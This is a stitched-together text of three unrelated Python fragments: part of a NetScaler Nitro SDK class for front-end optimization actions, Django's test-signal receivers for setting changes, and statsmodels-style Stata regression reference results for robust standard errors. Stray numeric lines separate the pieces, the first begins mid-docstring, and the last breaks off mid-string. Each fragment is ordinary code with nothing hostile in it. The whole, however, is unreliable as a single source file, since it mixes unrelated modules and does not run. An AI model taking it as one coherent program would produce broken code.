"""Flag to determine if front end optimization action is built-in or not.<br/>Possible values = MODIFIABLE, DELETABLE, IMMUTABLE, PARTITION_ALL. """ try : return self._builtin except Exception as e: raise e def _get_nitro_response(self, service, response) : """ converts nitro response into object and returns the object array in case of get request. """ try : result = service.payload_formatter.string_to_resource(feoaction_response, response, self.__class__.__name__) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == "ERROR") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.feoaction except Exception as e : raise e def _get_object_name(self) : """ Returns the value of object identifier argument """ try : if (self.name) : return str(self.name) return None except Exception as e : raise e @classmethod def add(cls, client, resource) : """ Use this API to add feoaction. """ try : if type(resource) is not list : addresource = feoaction() addresource.name = resource.name addresource.pageextendcache = resource.pageextendcache addresource.imgshrinktoattrib = resource.imgshrinktoattrib addresource.imggiftopng = resource.imggiftopng addresource.imginline = resource.imginline addresource.cssimginline = resource.cssimginline addresource.jpgoptimize = resource.jpgoptimize addresource.imglazyload = resource.imglazyload addresource.cssminify = resource.cssminify addresource.cssinline = resource.cssinline addresource.csscombine = resource.csscombine addresource.convertimporttolink = resource.convertimporttolink addresource.jsminify = resource.jsminify addresource.jsinline = resource.jsinline addresource.htmlminify = resource.htmlminify addresource.cssmovetohead = resource.cssmovetohead addresource.jsmovetoend = resource.jsmovetoend addresource.domainsharding = resource.domainsharding addresource.dnsshards = resource.dnsshards addresource.clientsidemeasurements = resource.clientsidemeasurements return addresource.add_resource(client) else : if (resource and len(resource) > 0) : addresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : addresources[i].name = resource[i].name addresources[i].pageextendcache = resource[i].pageextendcache addresources[i].imgshrinktoattrib = resource[i].imgshrinktoattrib addresources[i].imggiftopng = resource[i].imggiftopng addresources[i].imginline = resource[i].imginline addresources[i].cssimginline = resource[i].cssimginline addresources[i].jpgoptimize = resource[i].jpgoptimize addresources[i].imglazyload = resource[i].imglazyload addresources[i].cssminify = resource[i].cssminify addresources[i].cssinline = resource[i].cssinline addresources[i].csscombine = resource[i].csscombine addresources[i].convertimporttolink = resource[i].convertimporttolink addresources[i].jsminify = resource[i].jsminify addresources[i].jsinline = resource[i].jsinline addresources[i].htmlminify = resource[i].htmlminify addresources[i].cssmovetohead = resource[i].cssmovetohead addresources[i].jsmovetoend = resource[i].jsmovetoend addresources[i].domainsharding = resource[i].domainsharding addresources[i].dnsshards = resource[i].dnsshards addresources[i].clientsidemeasurements = resource[i].clientsidemeasurements result = cls.add_bulk_request(client, addresources) return result except Exception as e : raise e @classmethod def update(cls, client, resource) : """ Use this API to update feoaction. """ try : if type(resource) is not list : updateresource = feoaction() updateresource.name = resource.name updateresource.pageextendcache = resource.pageextendcache updateresource.imgshrinktoattrib = resource.imgshrinktoattrib updateresource.imggiftopng = resource.imggiftopng updateresource.imginline = resource.imginline updateresource.cssimginline = resource.cssimginline updateresource.jpgoptimize = resource.jpgoptimize updateresource.imglazyload = resource.imglazyload updateresource.cssminify = resource.cssminify updateresource.cssinline = resource.cssinline updateresource.csscombine = resource.csscombine updateresource.convertimporttolink = resource.convertimporttolink updateresource.jsminify = resource.jsminify updateresource.jsinline = resource.jsinline updateresource.htmlminify = resource.htmlminify updateresource.cssmovetohead = resource.cssmovetohead updateresource.jsmovetoend = resource.jsmovetoend updateresource.domainsharding = resource.domainsharding updateresource.dnsshards = resource.dnsshards updateresource.clientsidemeasurements = resource.clientsidemeasurements return updateresource.update_resource(client) else : if (resource and len(resource) > 0) : updateresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : updateresources[i].name = resource[i].name updateresources[i].pageextendcache = resource[i].pageextendcache updateresources[i].imgshrinktoattrib = resource[i].imgshrinktoattrib updateresources[i].imggiftopng = resource[i].imggiftopng updateresources[i].imginline = resource[i].imginline updateresources[i].cssimginline = resource[i].cssimginline updateresources[i].jpgoptimize = resource[i].jpgoptimize updateresources[i].imglazyload = resource[i].imglazyload updateresources[i].cssminify = resource[i].cssminify updateresources[i].cssinline = resource[i].cssinline updateresources[i].csscombine = resource[i].csscombine updateresources[i].convertimporttolink = resource[i].convertimporttolink updateresources[i].jsminify = resource[i].jsminify updateresources[i].jsinline = resource[i].jsinline updateresources[i].htmlminify = resource[i].htmlminify updateresources[i].cssmovetohead = resource[i].cssmovetohead updateresources[i].jsmovetoend = resource[i].jsmovetoend updateresources[i].domainsharding = resource[i].domainsharding updateresources[i].dnsshards = resource[i].dnsshards updateresources[i].clientsidemeasurements = resource[i].clientsidemeasurements result = cls.update_bulk_request(client, updateresources) return result except Exception as e : raise e @classmethod def unset(cls, client, resource, args) : """ Use this API to unset the properties of feoaction resource. Properties that need to be unset are specified in args array. """ try : if type(resource) is not list : unsetresource = feoaction() if type(resource) != type(unsetresource): unsetresource.name = resource else : unsetresource.name = resource.name return unsetresource.unset_resource(client, args) else : if type(resource[0]) != cls : if (resource and len(resource) > 0) : unsetresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : unsetresources[i].name = resource[i] else : if (resource and len(resource) > 0) : unsetresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : unsetresources[i].name = resource[i].name result = cls.unset_bulk_request(client, unsetresources, args) return result except Exception as e : raise e @classmethod def delete(cls, client, resource) : """ Use this API to delete feoaction. """ try : if type(resource) is not list : deleteresource = feoaction() if type(resource) != type(deleteresource): deleteresource.name = resource else : deleteresource.name = resource.name return deleteresource.delete_resource(client) else : if type(resource[0]) != cls : if (resource and len(resource) > 0) : deleteresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : deleteresources[i].name = resource[i] else : if (resource and len(resource) > 0) : deleteresources = [ feoaction() for _ in range(len(resource))] for i in range(len(resource)) : deleteresources[i].name = resource[i].name result = cls.delete_bulk_request(client, deleteresources) return result except Exception as e : raise e @classmethod def get(cls, client, name="", option_="") : """ Use this API to fetch all the feoaction resources that are configured on netscaler. """ try : if not name : obj = feoaction() response = obj.get_resources(client, option_) else : if type(name) != cls : if type(name) is not list : obj = feoaction() obj.name = name response = obj.get_resource(client, option_) else : if name and len(name) > 0 : response = [feoaction() for _ in range(len(name))] obj = [feoaction() for _ in range(len(name))] for i in range(len(name)) : obj[i] = feoaction() obj[i].name = name[i] response[i] = obj[i].get_resource(client, option_) return response except Exception as e : raise e @classmethod def get_filtered(cls, client, filter_) : """ Use this API to fetch filtered set of feoaction resources. filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = feoaction() option_ = options() option_.filter = filter_ response = obj.getfiltered(client, option_) return response except Exception as e : raise e @classmethod def count(cls, client) : """ Use this API to count the feoaction resources configured on NetScaler. """ try : obj = feoaction() option_ = options() option_.count = True response = obj.get_resources(client, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e : raise e @classmethod def count_filtered(cls, client, filter_) : """ Use this API to count filtered the set of feoaction resources. Filter string should be in JSON format.eg: "port:80,servicetype:HTTP". """ try : obj = feoaction() option_ = options() option_.count = True option_.filter = filter_ response = obj.getfiltered(client, option_) if response : return response[0].__dict__['___count'] return 0 except Exception as e : raise e class Builtin: MODIFIABLE = "MODIFIABLE" DELETABLE = "DELETABLE" IMMUTABLE = "IMMUTABLE" PARTITION_ALL = "PARTITION_ALL" class feoaction_response(base_response) : def __init__(self, length=1) : self.feoaction = [] self.errorcode = 0 self.message = "" self.severity = "" self.sessionid = "" self.feoaction = [feoaction() for _ in range(length)]
0.040919
import os import time import threading import warnings from django.conf import settings from django.db import connections from django.dispatch import receiver, Signal from django.utils import timezone from django.utils.functional import empty template_rendered = Signal(providing_args=["template", "context"]) setting_changed = Signal(providing_args=["setting", "value", "enter"]) # Most setting_changed receivers are supposed to be added below, # except for cases where the receiver is related to a contrib app. # Settings that may not work well when using 'override_settings' (#19031) COMPLEX_OVERRIDE_SETTINGS = {'DATABASES'} @receiver(setting_changed) def clear_cache_handlers(**kwargs): if kwargs['setting'] == 'CACHES': from django.core.cache import caches caches._caches = threading.local() @receiver(setting_changed) def update_installed_apps(**kwargs): if kwargs['setting'] == 'INSTALLED_APPS': # Rebuild any AppDirectoriesFinder instance. from django.contrib.staticfiles.finders import get_finder get_finder.cache_clear() # Rebuild management commands cache from django.core.management import get_commands get_commands.cache_clear() # Rebuild templatetags module cache. from django.template import base as mod mod.templatetags_modules = [] # Rebuild get_app_template_dirs cache. from django.template.utils import get_app_template_dirs get_app_template_dirs.cache_clear() # Rebuild translations cache. from django.utils.translation import trans_real trans_real._translations = {} @receiver(setting_changed) def update_connections_time_zone(**kwargs): if kwargs['setting'] == 'TIME_ZONE': # Reset process time zone if hasattr(time, 'tzset'): if kwargs['value']: os.environ['TZ'] = kwargs['value'] else: os.environ.pop('TZ', None) time.tzset() # Reset local time zone cache timezone._localtime = None # Reset the database connections' time zone if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC': USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ: USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value'] else: # no need to change the database connnections' time zones return tz = 'UTC' if USE_TZ else TIME_ZONE for conn in connections.all(): conn.settings_dict['TIME_ZONE'] = tz tz_sql = conn.ops.set_time_zone_sql() if tz_sql: conn.cursor().execute(tz_sql, [tz]) @receiver(setting_changed) def clear_context_processors_cache(**kwargs): if kwargs['setting'] == 'TEMPLATE_CONTEXT_PROCESSORS': from django.template import context context._standard_context_processors = None @receiver(setting_changed) def clear_template_loaders_cache(**kwargs): if kwargs['setting'] == 'TEMPLATE_LOADERS': from django.template.loaders.utils import get_template_loaders get_template_loaders.cache_clear() @receiver(setting_changed) def clear_serializers_cache(**kwargs): if kwargs['setting'] == 'SERIALIZATION_MODULES': from django.core import serializers serializers._serializers = {} @receiver(setting_changed) def language_changed(**kwargs): if kwargs['setting'] in {'LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS'}: from django.utils.translation import trans_real trans_real._default = None trans_real._active = threading.local() if kwargs['setting'] in {'LANGUAGES', 'LOCALE_PATHS'}: from django.utils.translation import trans_real trans_real._translations = {} trans_real.check_for_language.cache_clear() @receiver(setting_changed) def file_storage_changed(**kwargs): file_storage_settings = { 'DEFAULT_FILE_STORAGE', 'FILE_UPLOAD_DIRECTORY_PERMISSIONS', 'FILE_UPLOAD_PERMISSIONS', 'MEDIA_ROOT', 'MEDIA_URL', } if kwargs['setting'] in file_storage_settings: from django.core.files.storage import default_storage default_storage._wrapped = empty @receiver(setting_changed) def complex_setting_changed(**kwargs): if kwargs['enter'] and kwargs['setting'] in COMPLEX_OVERRIDE_SETTINGS: # Considering the current implementation of the signals framework, # stacklevel=5 shows the line containing the override_settings call. warnings.warn("Overriding setting %s can lead to unexpected behavior." % kwargs['setting'], stacklevel=5) @receiver(setting_changed) def root_urlconf_changed(**kwargs): if kwargs['setting'] == 'ROOT_URLCONF': from django.core.urlresolvers import clear_url_caches, set_urlconf clear_url_caches() set_urlconf(None)
0
import numpy as np class Bunch(dict): def __init__(self, **kw): dict.__init__(self, kw) self.__dict__ = self for i,att in enumerate(['params', 'bse', 'tvalues', 'pvalues']): self[att] = self.params_table[:,i] est = dict( N_clust = 10, N = 200, df_m = 2, df_r = 9, F = 51.59060716590177, r2 = .8124080178314147, rmse = 94.40840193979599, mss = 7604093.484267689, rss = 1755850.432294737, r2_a = .8105035307027997, ll = -1191.80235741801, ll_0 = -1359.150955647688, rank = 3, cmdline = "regress invest mvalue kstock, vce(cluster company)", title = "Linear regression", marginsok = "XB default", vce = "cluster", depvar = "invest", cmd = "regress", properties = "b V", predict = "regres_p", model = "ols", estat_cmd = "regress_estat", vcetype = "Robust", clustvar = "company", ) params_table = np.array([ .11556215606596, .01589433647768, 7.2706499090564, .00004710548549, .07960666895505, .15151764317688, 9, 2.2621571627982, 0, .23067848754982, .08496711097464, 2.7149150406994, .02380515903536, .03846952885627, .42288744624337, 9, 2.2621571627982, 0, -42.714369016733, 20.425202580078, -2.0912580352272, .06604843284516, -88.919387334862, 3.4906493013959, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00025262993207, -.00065043385106, .20961897960949, -.00065043385106, .00721940994738, -1.2171040967615, .20961897960949, -1.2171040967615, 417.18890043724]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, N_clust = 10, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 93.69766358599176, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 51.59060716590192, Fp = .0000117341240941, Fdf1 = 2, Fdf2 = 9, yy = 13620706.07273678, yyc = 9359943.916562419, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, clustvar = "company", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, cluster(company)", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", vce = "robust cluster", partialsmall = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .01500272788516, 7.7027429245215, 1.331761148e-14, .08615734974119, .14496696239074, np.nan, 1.9599639845401, 0, .23067848754982, .08020079648691, 2.8762618035529, .00402415789383, .07348781490405, .38786916019559, np.nan, 1.9599639845401, 0, -42.714369016733, 19.27943055305, -2.2155410088072, .02672295281194, -80.501358543152, -4.9273794903145, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .000225081844, -.00057950714469, .1867610305767, -.00057950714469, .00643216775713, -1.0843847053056, .1867610305767, -1.0843847053056, 371.69644244987]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, N_g = 10, df_m = 2, df_r = 9, F = 97.97910905239282, r2 = .8124080178314147, rmse = 94.40840193979599, lag = 4, cmd = "xtscc", predict = "xtscc_p", method = "Pooled OLS", depvar = "invest", vcetype = "Drisc/Kraay", title = "Regression with Driscoll-Kraay standard errors", groupvar = "company", properties = "b V", ) params_table = np.array([ .11556215606596, .0134360177573, 8.6009231420662, .00001235433261, .08516777225681, .14595653987512, 9, 2.2621571627982, 0, .23067848754982, .04930800664089, 4.678317037431, .00115494570515, .11913602714384, .3422209479558, 9, 2.2621571627982, 0, -42.714369016733, 12.190347184209, -3.5039501641153, .0066818746948, -70.290850216489, -15.137887816977, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00018052657317, -.00035661054613, -.06728261073866, -.00035661054613, .0024312795189, -.32394785247278, -.06728261073866, -.32394785247278, 148.60456447156]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_groupsum4 = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( df_m = 2, df_r = 197, F = 73.07593045506036, N = 200, lag = 4, rank = 3, title = "Regression with Newey-West standard errors", cmd = "newey", cmdline = "newey invest mvalue kstock, lag(4) force", estat_cmd = "newey_estat", predict = "newey_p", vcetype = "Newey-West", depvar = "invest", properties = "b V", ) params_table = np.array([ .11556215606596, .01142785251475, 10.112324771147, 1.251631065e-19, .0930255277205, .13809878441142, 197, 1.9720790337785, 0, .23067848754982, .06842168281423, 3.3714237660029, .00089998163666, .09574552141602, .36561145368361, 197, 1.9720790337785, 0, -42.714369016733, 16.179042041128, -2.6401049523298, .00895205094219, -74.620718612662, -10.808019420804, 197, 1.9720790337785, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .0001305958131, -.00022910455176, .00889686530849, -.00022910455176, .00468152667913, -.88403667445531, .00889686530849, -.88403667445531, 261.76140136858]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_panel4 = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, df_r = 9, N_clust = 10, N_clust1 = 10, N_clust2 = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 94.40840193979601, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 57.99124535923564, Fp = 7.21555935862e-06, Fdf1 = 2, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, yy = 13620706.07273678, Fdf2 = 9, clustvar = "company time", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company and time", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, cluster(company time) small", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", clustvar2 = "time", clustvar1 = "company", vce = "robust two-way cluster", partialsmall = "small", small = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .01635175387097, 7.0672636695645, .00005873628221, .07857191892244, .15255239320949, 9, 2.2621571627982, 0, .23067848754982, .07847391274682, 2.9395563375824, .01649863150032, .05315816373679, .40819881136285, 9, 2.2621571627982, 0, -42.714369016733, 19.505607409785, -2.189850750062, .05626393734425, -86.839118533508, 1.4103805000422, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00026737985466, -.00070163493529, .19641438763743, -.00070163493529, .0061581549818, -.99627581152391, .19641438763743, -.99627581152391, 380.46872042467]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_2groups_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, N_clust = 10, N_clust1 = 10, N_clust2 = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 93.69766358599176, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 57.99124535923565, Fp = 7.21555935862e-06, Fdf1 = 2, Fdf2 = 9, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, yy = 13620706.07273678, clustvar = "company time", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company and time", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, cluster(company time)", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", clustvar2 = "time", clustvar1 = "company", vce = "robust two-way cluster", partialsmall = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .01543448599542, 7.487269488613, 7.032121917e-14, .08531111939505, .14581319273688, np.nan, 1.9599639845401, 0, .23067848754982, .07407184066336, 3.1142534799181, .00184410987255, .08550034758104, .3758566275186, np.nan, 1.9599639845401, 0, -42.714369016733, 18.411420987265, -2.319993065515, .02034125246974, -78.800091055978, -6.6286469774879, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00023822335794, -.00062512499511, .17499633632219, -.00062512499511, .00548663757926, -.88763669036779, .17499633632219, -.88763669036779, 338.98042277032]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_2groups_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, bw = 5, N_clust = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 93.69766358599176, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 92.14467466912147, Fp = 1.66368179227e-10, Fdf1 = 2, Fdf2 = 19, yy = 13620706.07273678, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, clustvar = "year", hacsubtitleV2 = "and kernel-robust to common correlated disturbances (Driscoll-Kraay)", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on year", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, dkraay(5)", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", vce = "cluster ac bartlett bw=5", partialsmall = "small", ivar = "company", tvar = "year", kernel = "Bartlett", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .0134360177573, 8.6009231420662, 7.907743030e-18, .08922804516602, .14189626696591, np.nan, 1.9599639845401, 0, .23067848754982, .04930800664089, 4.678317037431, 2.892390940e-06, .13403657038422, .32732040471542, np.nan, 1.9599639845401, 0, -42.714369016733, 12.190347184209, -3.5039501641153, .00045841113727, -66.607010456823, -18.821727576643, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00018052657317, -.00035661054613, -.06728261073866, -.00035661054613, .0024312795189, -.32394785247278, -.06728261073866, -.32394785247278, 148.60456447156]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_groupsum4_ivreg_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, bw = 5, df_r = 19, N_clust = 20, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .8124080178314146, rmse = 94.40840193979601, rss = 1755850.432294737, mss = 7604093.484267682, r2_a = .8105035307027995, F = 92.14467466912149, Fp = 1.66368179227e-10, Fdf1 = 2, Fdf2 = 19, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -1191.802357418011, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .8124080178314146, r2u = .8710896173136538, yyc = 9359943.916562419, yy = 13620706.07273678, clustvar = "year", hacsubtitleV2 = "and kernel-robust to common correlated disturbances (Driscoll-Kraay)", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on year", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock, dkraay(5) small", cmd = "ivreg2", model = "ols", depvar = "invest", vcetype = "Robust", vce = "cluster ac bartlett bw=5", partialsmall = "small", small = "small", ivar = "company", tvar = "year", kernel = "Bartlett", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11556215606596, .0138548615926, 8.3409101775303, 8.967911239e-08, .08656359748216, .14456071464977, 19, 2.0930240544083, 0, .23067848754982, .0508450956047, 4.5368876743442, .00022550505646, .12425847940049, .33709849569915, 19, 2.0930240544083, 0, -42.714369016733, 12.570359466158, -3.3980228752988, .00301793225123, -69.02443375196, -16.404304281506, 19, 2.0930240544083, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00019195718975, -.00037919048186, -.07154282413568, -.00037919048186, .00258522374705, -.34445964542925, -.07154282413568, -.34445964542925, 158.01393710842]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_nw_groupsum4_ivreg_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) ######################### WLS est = dict( N = 200, df_m = 2, df_r = 197, F = 158.2726503915062, r2 = .7728224625923459, rmse = 35.1783035325949, mss = 829335.6968772264, rss = 243790.0687679817, r2_a = .7705160916541971, ll = -994.3622459900876, ll_0 = -1142.564592396746, rank = 3, cmdline = "regress invest mvalue kstock [aw=1/mvalue], robust", title = "Linear regression", marginsok = "XB default", vce = "robust", depvar = "invest", cmd = "regress", properties = "b V", predict = "regres_p", model = "ols", estat_cmd = "regress_estat", wexp = "= 1/mvalue", wtype = "aweight", vcetype = "Robust", ) params_table = np.array([ .11694307068216, .00768545583365, 15.2161528494, 4.371656843e-35, .10178674436759, .13209939699674, 197, 1.9720790337785, 0, .10410756769914, .00986959606725, 10.548310892334, 6.565731752e-21, .08464394422305, .12357119117523, 197, 1.9720790337785, 0, -9.2723336171089, 2.3458404391932, -3.9526702081656, .00010767530575, -13.898516363832, -4.6461508703863, 197, 1.9720790337785, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00005906623137, 6.805470065e-06, -.01210153268743, 6.805470065e-06, .00009740892653, -.01511046663892, -.01210153268743, -.01511046663892, 5.502967366154]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_hc1_wls_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N_clust = 10, N = 200, df_m = 2, df_r = 9, F = 22.90591346432732, r2 = .7728224625923459, rmse = 35.1783035325949, mss = 829335.6968772264, rss = 243790.0687679817, r2_a = .7705160916541971, ll = -994.3622459900876, ll_0 = -1142.564592396746, rank = 3, cmdline = "regress invest mvalue kstock[aw=1/mvalue], vce(cluster company)", title = "Linear regression", marginsok = "XB default", vce = "cluster", depvar = "invest", cmd = "regress", properties = "b V", predict = "regres_p", model = "ols", estat_cmd = "regress_estat", wexp = "= 1/mvalue", wtype = "aweight", vcetype = "Robust", clustvar = "company", ) params_table = np.array([ .11694307068216, .02609630113434, 4.4812124936848, .00152974827456, .05790913614858, .17597700521575, 9, 2.2621571627982, 0, .10410756769914, .02285882773869, 4.5543703679489, .00137730504553, .05239730679689, .15581782860139, 9, 2.2621571627982, 0, -9.2723336171089, 5.7204731422962, -1.6209032690934, .13948922172294, -22.212942910549, 3.6682756763312, 9, 2.2621571627982, 0]).reshape(3,9) params_table_colnames = 'b se t pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00068101693289, -.00006496077364, -.08926939086077, -.00006496077364, .00052252600559, -.0697116307149, -.08926939086077, -.0697116307149, 32.723812971732]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_wls_small = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est ) est = dict( N = 200, inexog_ct = 2, exexog_ct = 0, endog_ct = 0, partial_ct = 0, N_clust = 10, df_m = 2, sdofminus = 0, dofminus = 0, r2 = .772822462592346, rmse = 34.91346937558495, rss = 243790.0687679817, mss = 829335.6968772268, r2_a = .7705160916541972, F = 22.9059134643273, Fp = .000294548654088, Fdf1 = 2, Fdf2 = 9, yy = 1401938.856802022, yyc = 1073125.765645209, partialcons = 0, cons = 1, jdf = 0, j = 0, ll = -994.3622459900874, rankV = 3, rankS = 3, rankxx = 3, rankzz = 3, r2c = .772822462592346, r2u = .8261050632949187, clustvar = "company", hacsubtitleV = "Statistics robust to heteroskedasticity and clustering on company", hacsubtitleB = "Estimates efficient for homoskedasticity only", title = "OLS estimation", predict = "ivreg2_p", version = "03.1.07", cmdline = "ivreg2 invest mvalue kstock 